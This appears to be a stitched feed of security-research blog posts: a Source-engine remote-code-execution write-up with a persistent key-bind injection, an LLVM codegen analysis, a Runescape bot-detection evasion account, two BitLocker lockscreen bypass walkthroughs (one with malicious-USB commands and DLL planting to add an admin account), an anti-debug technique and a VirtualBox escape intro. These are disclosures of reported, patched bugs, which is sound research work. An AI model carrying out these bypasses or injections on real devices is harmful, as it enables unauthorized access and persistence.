At this point, all that is left to do is constructing a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets only. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets at based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game called xinput1_3.dll has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit to work is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit to reach its full potential. One shellcode to rule them all or in other words: Whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

Also bind +showscores as that way tab keeps showing the scoreboard.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my github. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve seems to now use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. After all, at least a warning is displayed that shows the parameters your game is about to start with for those games. The next image shows how such a warning would look like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure about the existence of this bug has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put and are going to put into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

  1. https://developer.valvesoftware.com/wiki/Source_RCON_Protocol 

A look at LLVM - comparing clamp implementations

9 April 2021 at 00:00
By: duk

Please note that this is not an endorsement or criticism of either of these languages. It’s simply something I found interesting with how LLVM handles code generation between the two. This is an implementation quirk, not a language issue.

Update (April 9, 2021): A bug report was filed and a fix was pushed!

The LLVM project is a modular set of tools that make designing and implementing a compiler significantly easier. The most well known part of LLVM is their intermediate representation; IR for short. LLVM’s IR is an extremely powerful tool, designed to make optimization and targeting many architectures as easy as possible. Many tools use LLVM IR; the Clang C++ compiler and the Rust compiler (rustc) are both notable examples. However, despite this unified architecture, code generation can still vary wildly between implementations and how the IR is used. Some time ago, I stumbled upon this tweet discussing Rust’s implementation of clamping compared to C++:

Rust 1.50 is out and has f32.clamp. I had extremely low expectations for performance based on C++ experience but as usual Rust proves to be "C++ done right".

Of course Zig already has clamp and also gets codegen right. pic.twitter.com/0WI1fLrQaB

— Arseny Kapoulkine (@zeuxcg) February 11, 2021

Rust’s code generation on the latest version of LLVM is far superior compared to an equivalent Clang version using std::clamp, even though they use the same underlying IR:

With f32.clamp:

pub fn clamp(v: f32) -> f32 {
    v.clamp(-1.0, 1.0)
}

The corresponding assembly is shown below. It is short, concise, and pretty much the best you’re going to get. We can see two memory accesses to get the clamp bounds and efficient use of x86 instructions.

.LCPI0_0:
        .long   0xbf800000
.LCPI0_1:
        .long   0x3f800000
example::clamp:
        movss   xmm1, dword ptr [rip + .LCPI0_0]
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI0_1]
        minss   xmm0, xmm1
        ret

Next is a short C++ program using std::clamp:

#include <algorithm>
float clamp2(float v) {
    return std::clamp(v, -1.f, 1.f);
}

The corresponding assembly is shown below. It is significantly longer with many more data accesses, conditional moves, and is in general uglier.

.LCPI1_0:
        .long   0x3f800000                         float 1
.LCPI1_1:
        .long   0xbf800000                         float -1
clamp2(float):                                     @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0
        mov     dword ptr [rsp - 8], -1082130432  
        mov     dword ptr [rsp - 12], 1065353216  
        ucomiss xmm0, dword ptr [rip + .LCPI1_0]  
        lea     rax, [rsp - 12]
        lea     rcx, [rsp - 4]
        cmova   rcx, rax
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0
        lea     rax, [rsp - 8]
        cmovbe  rax, rcx
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret

Interestingly enough, reimplementing std::clamp causes this issue to disappear:

float clamp(float v, float lo, float hi) {
    v = (v < lo) ? lo : v;
    v = (v > hi) ? hi : v;
    return v;
}

float clamp1(float v) {
    return clamp(v, -1.f, 1.f);
}

The assembly generated here is the same as with Rust’s implementation:

.LCPI0_0:
        .long   0xbf800000                        # float -1
.LCPI0_1:  
        .long   0x3f800000                        # float 1
clamp1(float):                                    # @clamp1(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0 
        movss   xmm0, dword ptr [rip + .LCPI0_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret

Clearly, something is off between std::clamp and our implementation. According to the C++ reference, std::clamp takes two references along with a predicate (which defaults to std::less) and returns a reference. Functionally, the only difference between our code and std::clamp is that we do not use reference types. Knowing this, we can then reproduce the issue.

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

Once again, we’ve generated the same bad code as with std::clamp:

.LCPI1_0:
        .long   0x3f800000                        # float 1
.LCPI1_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0 
        mov     dword ptr [rsp - 8], -1082130432 
        mov     dword ptr [rsp - 12], 1065353216 
        ucomiss xmm0, dword ptr [rip + .LCPI1_0] 
        lea     rax, [rsp - 12] 
        lea     rcx, [rsp - 4] 
        cmova   rcx, rax 
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0 
        lea     rax, [rsp - 8] 
        cmovbe  rax, rcx 
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret

LLVM IR and Clang

LLVM IR is a Static Single Assignment (SSA) intermediate representation. What this means is that every variable is only assigned to once. In order to represent conditional assignments, SSA form uses a special type of instruction called a “phi” node, which picks a value based on the block that was previously running. However, Clang does not initially use phi nodes. Instead, to make initial code generation easier, variables in functions are allocated on the stack using alloca instructions. Reads and assignments to the variable are load and store instructions to the alloca, respectively:

int main() {
    float x = 0;
}

In this unoptimized IR, we can see an alloca instruction that then has the float value 0 stored to it:

define dso_local i32 @main() #0 {
  %1 = alloca float, align 4
  store float 0.000000e+00, float* %1, align 4
  ret i32 0
}

LLVM will then (hopefully) optimize away the alloca instructions with a relevant pass, like SROA.

LLVM IR and reference types

Reference types are represented as pointers in LLVM IR:

void test(float& x2) {
    x2 = 1;
}

In this optimized IR, we can see that the reference has been converted to a pointer with specific attributes.

define dso_local void @_Z4testRf(float* nocapture nonnull align 4 dereferenceable(4) %0) local_unnamed_addr #0 {
  store float 1.000000e+00, float* %0, align 4, !tbaa !2
  ret void
}

When a function is given a reference type as an argument, it is passed the underlying object’s address instead of the object itself. Also passed is some metadata about reference types. For example, nonnull and dereferenceable are set as attributes to the argument because the C++ standard dictates that references always have to be bound to a valid object. For us, this means the alloca instructions are passed directly to the clamp function:

__attribute__((noinline)) const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

In this optimized IR, we can see alloca instructions passed to bad_clamp corresponding to the variables passed as references.

define linkonce_odr dso_local nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %0, float* nonnull align 4 dereferenceable(4) %1, float* nonnull align 4 dereferenceable(4) %2) local_unnamed_addr #2 comdat {
  %4 = load float, float* %0, align 4
  %5 = load float, float* %1, align 4
  %6 = fcmp olt float %4, %5
  %7 = load float, float* %2, align 4
  %8 = fcmp ogt float %4, %7
  %9 = select i1 %8, float* %2, float* %0
  %10 = select i1 %6, float* %1, float* %9
  ret float* %10
}

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #1 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4
  store float -1.000000e+00, float* %3, align 4
  store float 1.000000e+00, float* %4, align 4                                                                                                                                         
  %6 = call nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %2, float* nonnull align 4 dereferenceable(4) %3, float* nonnull align 4 dereferenceable(4) %4)
  %7 = load float, float* %7, align 4
  ret float %7
}

Lifetime annotations are omitted to make the IR a bit clearer.

In this example, the noinline attribute was used to demonstrate passing references to functions. If we remove the attribute, the call is inlined into the function:

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}
float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

However, even after optimization, the alloca instructions are still there for seemingly no good reason. These alloca instructions should have been optimized away by LLVM’s passes; they’re not used anywhere else and there are no tricky stores or lifetime problems.

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #0 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4, !tbaa !2
  store float -1.000000e+00, float* %3, align 4, !tbaa !2
  store float 1.000000e+00, float* %4, align 4, !tbaa !2
  %5 = fcmp olt float %0, -1.000000e+00
  %6 = fcmp ogt float %0, 1.000000e+00
  %7 = select i1 %8, float* %4, float* %2
  %9 = select i1 %7, float* %3, float* %9
  %9 = load float, float* %10, align 4, !tbaa !2
  ret float %9
}

The only candidate here is the two sequential select instructions, as they operate on the pointers created by the alloca instructions instead of the underlying value. However, LLVM also has a pass for this; if possible, LLVM will try to “speculate” across select instructions that load their results.

select instructions are essentially ternary operators that pick one of the last two operands (float pointers in our case) based on the value of the first operand.

Select speculation - where things go wrong

A few calls down the chain, this function calls isDereferenceableAndAlignedPointer, which is what determines whether a pointer can be dereferenced. The code here exposes the main issue: the select instruction is never considered ‘dereferenceable’. As such, when there are two selects in sequence (as seen with our std::clamp), it will not try to speculate the select instruction and will not remove the alloca.

Fix 1: libcxx

A potential fix is modifying the original code to not produce select instructions in the same way. For example, we can mimic our original implementation with pointers instead of value types. Though the IR output change is relatively small, this gives us the code generation we want without modifying the LLVM codebase:

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

float clamp3(float v) {
    return better_ref_clamp(v, -1.f, 1.f);
}

As you can see, the IR generated after the call is inlined is significantly shorter and more efficient than before:

define dso_local float @_Z6clamp3f(float %0) local_unnamed_addr #1 {
  %2 = fcmp olt float %0, -1.000000e+00
  %3 = select i1 %2, float -1.000000e+00, float %0
  %4 = fcmp ogt float %3, 1.000000e+00
  %5 = select i1 %4, float 1.000000e+00, float %3
  ret float %5
}

And the corresponding assembly is back to what we want it to be:

.LCPI1_0:
        .long   0xbf800000                        # float -1
.LCPI1_1:
        .long   0x3f800000                        # float 1
clamp3(float):                                    # @clamp3(float)
        movss   xmm1, dword ptr [rip + .LCPI1_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI1_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret

Fix 2: LLVM

A much more general approach is fixing the code generation issue in LLVM itself, which could be as simple as this:

diff --git a/llvm/lib/Analysis/Loads.cpp b/llvm/lib/Analysis/Loads.cpp
index d8f954f575838d9886fce0df2d40407b194e7580..affb55c7867f48866045534d383b4d7ba19773a3 100644
--- a/llvm/lib/Analysis/Loads.cpp
+++ b/llvm/lib/Analysis/Loads.cpp
@@ -103,6 +103,14 @@ static bool isDereferenceableAndAlignedPointer(
         CtxI, DT, TLI, Visited, MaxDepth);
   }
 
+  // For select instructions, both operands need to be dereferenceable.
+  if (const SelectInst *SelInst = dyn_cast<SelectInst>(V))
+    return isDereferenceableAndAlignedPointer(SelInst->getOperand(1), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth) &&
+           isDereferenceableAndAlignedPointer(SelInst->getOperand(2), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth);
   // For gc.relocate, look through relocations
   if (const GCRelocateInst *RelocateInst = dyn_cast<GCRelocateInst>(V))
     return isDereferenceableAndAlignedPointer(RelocateInst->getDerivedPtr(),

All it does is add select instructions to the list of instruction types to consider potentially dereferenceable. Though it seems to fix the issue (and alive2 seems to like it), this is otherwise untested. Also, the codegen still isn’t perfect. Though the redundant memory accesses are removed, there are still many more instructions than in our libcxx fix (and Rust’s implementation):

.LCPI0_0:
        .long   0x3f800000                        # float 1
.LCPI0_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        minss   xmm1, xmm0 
        movss   xmm2, dword ptr [rip + .LCPI0_1]  # xmm2 = mem[0],zero,zero,zero
        cmpltss xmm0, xmm2
        movaps  xmm3, xmm0
        andnps  xmm3, xmm1
        andps   xmm0, xmm2
        orps    xmm0, xmm3
        ret

However, this is because of the ternary operators done in the original libcxx clamp:

template<class _Tp, class _Compare>
const _Tp& clamp(const _Tp& __v, const _Tp& __lo, const _Tp& __hi, _Compare __comp)
{
    _LIBCPP_ASSERT(!__comp(__hi, __lo), "Bad bounds passed to std::clamp");
    return __comp(__v, __lo) ? __lo : __comp(__hi, __v) ? __hi : __v;

}

The reason this doesn’t look as good is because LLVM needs to store the original value of __v for the second comparison. Due to this, it then can’t optimize the second part of this computation into a maxss as that would produce different behavior when __lo is greater than __hi and __v is negative.

const float& ref_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

int main() {
    printf("%f\n", ref_clamp(-2.f, 1.f, -1.f));        // this prints 1.000
    printf("%f\n", better_ref_clamp(-2.f, 1.f, -1.f)); // this prints -1.000
}

Even though we know this is undefined behavior in C++, LLVM doesn’t have enough information to know that. Adjusting code generation accordingly would be no easy task either. Despite all of this though, it does show how versatile LLVM truly is; relatively simple changes can have significant results.

How Runescape catches botters, and why they didn’t catch me

3 April 2021 at 23:00
By: vmcall

Player automation has always been a big concern in MMORPGs such as World of Warcraft and Runescape, and this kind of game-hacking is very different from traditional cheats in for example shooter games.

One weekend, I decided to take a look at the detection systems put in place by Jagex to prevent player automation in Runescape.

Botting

For the past months, an account named sch0u has been playing on world 67 around the clock doing mundane tasks such as killing mobs or harvesting resources. At first glance, this account looks just like any other player, but there is one key difference: it’s a bot.

I started this bot back in October with the goal of testing the limits of their bot detection system. I tried to find information online on how Jagex combats these botters, and only found videos of commercial bots bragging about how their mouse movement systems are indistinguishable from humans.

Therefore, the only thing I could deduce was that mouse movement matters, or does it?

Heuristics!

I started by analyzing the Runescape client to confirm this theory, and quickly noticed a global called hhk set shortly launch.

const auto module_handle = GetModuleHandleA(0);
hhk = SetWindowsHookExA(WH_MOUSE_LL, rs::mouse_hook_handler, module_handle, 0);

This installs a low level hook on the mouse by appending to the system-wide hook chain. This allows applications on Windows to intercept all mouse events, whether or not the events are related to your application. Low level hooks are frequently used by keyloggers, but have legitimate use cases such as heuristics like the aforementioned mouse hook.

The Runescape mouse handler is quite simple in its essence (the following pseudocode has been beautified by hand):

LRESULT __fastcall rs::mouse_hook_handler(int code, WPARAM wParam, LPARAM lParam)
{
  if ( rs::client::singleton )
  {
      // Call the internal logging handler
      rs::mouse_hook_handler_internal(rs::client::singleton->window_ctx, wParam, lParam);
  }
  // Pass the information to the next hook on the system
  return CallNextHookEx(hhk, code, wParam, lParam);
}
void __fastcall rs::mouse_hook_handler_internal(rs::window_ctx *window_ctx, __int64 wparam, _DWORD *lparam)
{
  // If the mouse event happens outside of the Runescape window, don't log it.
  if (!window_ctx->event_inside_of_window(lparam))
  {
    return;
  }

  switch (wparam)
  {
    case WM_MOUSEMOVE:
      rs::heuristics::log_movement(lparam);
      break;
    
    case WM_LBUTTONDOWN:
    case WM_LBUTTONDBLCLK:
    case WM_RBUTTONDOWN:
    case WM_RBUTTONDBLCLK:
    case WM_MBUTTONDOWN:
    case WM_MBUTTONDBLCLK:
      rs::heuristics::log_button(lparam);
      break;
  }
}

for bandwidth reasons, these rs::heuristics::log_* functions use simple algorithms to skip event data that resembles previous logged events.

This event data is later parsed by the function rs::heuristics::process, which is called every frame by the main render loop.


void __fastcall rs::heuristics::process(rs::heuristic_engine *heuristic_engine)
{
  // Don't process any data if the player is not in a world
  auto client = heuristic_engine->client;
  if (client->state != STATE_IN_GAME)
  {
    return;
  }

  // Make sure the connection object is properly initialised
  auto connection = client->network->connection;
  if (!connection || connection->server->mode != SERVER_INITIALISED)
  {
    return;
  }

  // The following functions parse and pack the event data, and is later sent
  // by a different component related to networking that has a queue system for
  // packets.

  // Process data gathered by internal handlers
  rs::heuristics::process_source(&heuristic_engine->event_client_source);

  // Process data gathered by the low level mouse hook
  rs::heuristics::process_source(&heuristic_engine->event_hook_source);
}

Away from keyboard?

While reversing, I put effort into knowing the relevance of the function I am looking at, primarily by hooking or patching the function in question. You can usually deduce the relevance of a function by rendering it useless and observing the state of the software, and this methodology lead to an interesting observation.

By preventing the game from calling the function rs::heuristics::process, I didn’t immediately notice anything, but after exactly five minutes, I was logged out of the game. Apparently, Runescape decides if a player is inactive by solely looking at the heuristic data sent to the server by the client, even though you can play the game just fine. This raised a new question: If the server doesn’t think I am playing, does it think I am botting?.

This lead to spending a few days reverse engineering the networking layer of the game, which resulted in my ability to bot almost anything using only network packets.

To prove my theory, I botted twenty four hours a day, seven days a week, without ever moving my mouse. After doing this for thousands of hours, I can safely state that their bot detection either relies on the heuristic event data sent by the client, or is only run when the player is not “afk”. Any player that manages to play without moving their mouse should be banned immediately, thus making this oversight worth revisiting.

BitLocker touch-device lockscreen bypass

29 January 2021 at 23:00

Microsoft has for the past years done a great job at hardening the Windows lockscreen, but after Jonas published CVE-2020-1398, I put effort into weaponizing an old bug I had found in Windows Touch devices.

These exploits rely on the fundamental design of the Windows Lockscreen, where the instance that prompts the user for password runs with SYSTEM privileges. This means that even though most of the UI is blocked, you can always find a way to do some damage when there are options like “Reset password”

Clicking this button will result in a new user being created with the name of defaultuser1, defaultuser100000, defaultuser100001 (et cetera), and a new instance of WWAHost asking for user account credentials will be spawned. If everything is in order, it will ask you for a new pin, otherwise you will be stuck in this instance.

Bypassing BitLocker in 5 easy steps

  • Connect a physical keyboard
  • Enable the narrator
  • Select “I have forgotten my password.” and “Text <phonenumber>”
  • Change the size of the on-screen keyboard and open keyboard settings
  • Interact with the hidden settings window to execute our payload

Constraints

To exploit this vulnerability, you will need:

  1. A surface touchscreen device. I used a surface book 2 15’ (Running up-to-date Windows 10 20H2 with BitLocker enabled)
  2. A external keyboard
  3. A flash drive containing your payload.

Keyboard confusion

By connecting a external keyboard to our Surface device, we have the capability using both the on-screen and the physical keyboard. This is necessary to abuse certain functionality that allows us to bypass the lockscreen.

Narration

Windows includes various accessibility features such as narration. This functionality allows us to operate on hidden UI elements, as the narrator will read any selected element out loud, visible or not. Turn it on by clicking Windows+U and selecting “Enable narrator”

I forgot my password

A Forgotten password is one of the few cases you would ever do anything but login on the Windows lockscreen. The first part of our bypass requires you to select “I have forgotten my password.” on the login screen. This will open up a Microsoft Account login form, where you can choose to recover your password by texting a certain phone number. Selecting this opens up a text bar where you would normally type in the full recovery phone number, but in our case that is not the point. By opening this text bar, we can make the touch device display an on screen keyboard, which was the goal all along. With this software keyboard, you can change the size of the keyboard by hitting the options button in the top left, choose the largest keyboard available.

Now you should have a large software keyboard where you can open the settings menu:

After initialising the launch of keyboard settings, there is a small time frame where you can double click on this grey area here:

If you did this successfully, the narrator should explicitly say “Settings window”

Navigating settings

You wouldn’t think you could much with a hidden settings window on a locked Windows device, but you can actually navigate said window with a external keyboard. While holding down the Caps Lock key, the arrow keys and the tab key can be used to navigate UI elements.

One weaponization of this is going to Autoplay -> Removable drives -> Open folder to view files. This launches File Explorer, where you can execute windows binaries from a usb thumb-drive.

Disclosure

I reported the issue to MSRC, but they ignored the bug report citing a need of PoC, which I had already provided, they had also expressed disbelief towards the exploitability of this bug.

Demonstration

Process on a diet: anti-debug using job objects

20 January 2021 at 23:00
By: jm

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits;
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process of placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

BitLocker Lockscreen bypass

15 January 2021 at 23:00
By: Jonas L

BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.

Bypassing BitLocker in 6 easy steps

Given a Windows 10 system without known passwords and a BitLocker-protected hard drive, an administrator account could be adding by doing the following:

  • At the sign-in screen, select “I have forgotten my password.”
  • Bypass the lock and enable autoplay of removable drives.
  • Insert a USB stick with my .exe and a junction folder.
  • Run executable.
  • Remove the thumb drive and put it back in again, go to the main screen.
  • From there launch narrator, that will execute a DLL payload planted earlier.

Now a user account is added called hax with password “hax” with membership in Administrators. To update the list with accounts to log into, click I forgot my password and then return to the main screen.

Bypassing the lock screen

First, we select the “I have forgotten my password/PIN” option. This option launches an additional session, with an account that gets created/deleted as needed; the user profile service calls it a default-account. It will have the first available name of defaultuser1, defaultuser100000, defaultuser100001, etc.

To escape the lock, we have to use the Narrator because if we manage to launch something, we cannot see it, but using the Narrator, we will be able to navigate it. However, how do we launch something?

If we smash shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is, keep clicking the link roughly 2 times a second. The sticky keys windows will disappear. Keep clicking! You will now see a focus box is drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.

Now we can navigate the Settings app using CapsLock + Left Arrow, press that until we reach Home. Now, when Home has focus, hold down Caps Lock and press Enter. Using CapsLock + Right Arrow navigate to Devices and CapsLock + Enter when it is in focus.

Now navigate to AutoPlay, CapsLock + Enter and choose “Open Folder to view files (File Explorer).” Now insert the prepared USB drive, wait some seconds, the Narrator will announce the drive has been opened, and the window is focused. Now select the file Exploit.exe and execute it with CapsLock + Enter. That is arbitrary code execution, ladies and gentlemen, without using any passwords. However, we are limited by running as the default profile.

I have made a video with my phone, as I cannot take screenshots.

Elevation of privilege

When a USB stick is mounted, BitLocker will create a directory named ClientRecoveryPasswordRotation in System Volume Information and set permissions to:

NT AUTHORITY\Authenticated Users:(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

To redirect the create operation, a symbolic link in the NT namespace is needed as that allows us to control the filename, and the existence of the link does not abort the operation as it is still creating the directory.

Therefore, take a USB drive and make \System Volume Information a mount point targeting \RPC Control. Then make a symbolic link in \RPC Control\ClientRecoveryPasswordRotation targetting \??\C:\windows\system32\Narrator.exe.local. If the USB stick is reinserted then the folder C:\windows\system32\Narrator.exe.local will be created with permissions that allows us to create a subdirectory:

amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.657_none_e6c5b579130e3898

Inside this subdirectory, we drop a payload DLL named comctl32.dll. Next time the Narrator is triggered, it will load the DLL. By the way, I chose the Narrator as that is triggerable from the login screen as a system service and is not auto-loaded, so if anything goes wrong, we can still boot.

Combining them

The ClientRecoveryPasswordRotation exploit to work requires a symbolic link in \RPC Control. The executable on the USB drive creates the link using two calls to DefineDosDevice, making the link permanent so they can survive a logout/in if needed.

Then a loop is started in which the executable will:

  • Try to create the subdirectory.
  • Plant the payload comctl32.dll inside it.

It is easy to see when the loop is running because the Narrator will move its focus box and say “access denied” every second. We can now use the link created in RPC Control. Unplug the USB stick and reinsert it. The writeable directory will be created in System32; on the next loop iteration, the payload will get planted, and exploit.exe will exit. To test if the exploit has been successful, close the Narrator and try to start it again.

If the narrator does not work, it is because the DLL is planted, and Narrator executes it, but it fails to add an account because it is launched as defaultuser1. When the payload is planted, you will need to click back to the login screen and start Narrator; 3 beeps should play, and a message box saying the DLL has been loaded as SYSTEM should show. Great! The account has been created, but it is not in the list. Press “I forgot my password” and click back to update the list.

A new account named hax should appear, with password hax.

Making a malicious USB

I used these steps to arm the USB device

C:\Users\jonas>format D: /fs:ntfs /q
Insert new disk for drive D:
Press ENTER when ready...
-----
File System: NTFS.
Quick Formatting 30.0 GB
Volume label (32 characters, ENTER for none)?
Creating file system structures.
Format complete.
30.0 GB total disk space.
30.0 GB are available.

Now, we need to elevate to admin to delete System Volume Information.

C:\Users\jonas>d:
D:\>takeown /F "System Volume Information"

This results in

SUCCESS: The file (or folder): "D:\System Volume Information" now owned by user "DESKTOP-LTJEFST\jonas".

We can then

D:\>icacls "System Volume Information" /grant Everyone:(F)
Processed file: System Volume Information
Successfully processed 1 files; Failed processing 0 files
D:\>rmdir /s /q "System Volume Information"

We will use James Forshaw’s tool (attached) to create the mount point.

D:\>createmountpoint "System Volume Information" "\RPC Control"

Then copy the attached exploit.exe to it.

D:\>copy c:\Users\jonas\source\repos\exploitKit\x64\Release\exploit.exe .
1 file(s) copied.

Patch

I disclosed this vulnerability and it was assigned CVE-2020-1398. Its patch can be found here

Escaping VirtualBox 6.1: Part 1

14 January 2021 at 23:00

This post is about a VirtualBox escape for the latest currently available version (VirtualBox 6.1.16 on Windows). The vulnerabilities were discovered and exploited by our team Sauercl0ud as part of the RealWorld CTF 2020/2021.

The vulnerability was known to the organizers, requires the guest to be able to insert kernel modules and isn’t exploitable on default configurations of VirtualBox so the impact is very limited.

Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.

Let’s get to some pwning :D

